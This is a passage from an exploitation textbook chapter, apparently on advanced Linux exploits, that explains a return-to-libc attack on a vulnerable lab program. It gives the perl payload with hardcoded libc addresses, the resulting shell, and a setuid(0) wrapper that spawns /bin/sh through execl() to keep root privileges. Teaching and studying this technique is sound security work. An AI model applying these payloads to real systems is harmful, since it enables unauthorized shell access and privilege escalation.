Why was this? The program crashed when we left the user level shell
because the filler we supplied (0x42424242) became the saved eip to be executed after the
system() function. So a crashwas the expected behavior when the program ended. To avoid
that crash, we will simply supply the pointer to the exit() function in that filler location.
BT book $ ./vuln2 `perl -e 'print "AAAA"x7 .
\xe0\x86\xed\xb7","\xa0\xe3\xec\xb7","\xc7\x04\xfc\xb7"''
sh-3.1$ id
uid=1001(joe) gid=100(users) groups=100(users)
sh-3.1$ exit
exit
BT book $
As for the lack of root privilege, the system() function drops privileges when it calls a
program. To get around this, we need to use a wrapper program. The wrapper program
will contain the system function call. Then we will call the wrapper program with the
execl() function that does not drop privileges. The wrapper will look like this:
BT book $ cat wrapper.c
int main(){
setuid(0);
setgid(0);
system("/bin/sh");
}
BT book $ gcc -o wrapper wrapper.c
Chapter 8: Advanced Linux Exploits
189
PART III
Notice that we do not need the wrapper program to be SUID. Now we need to call the
wrapper with the execl() function like this:
execl("./wrapper", "./wrapper", NULL)
Youmay now see that we have another issue to work through.
Pages:
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373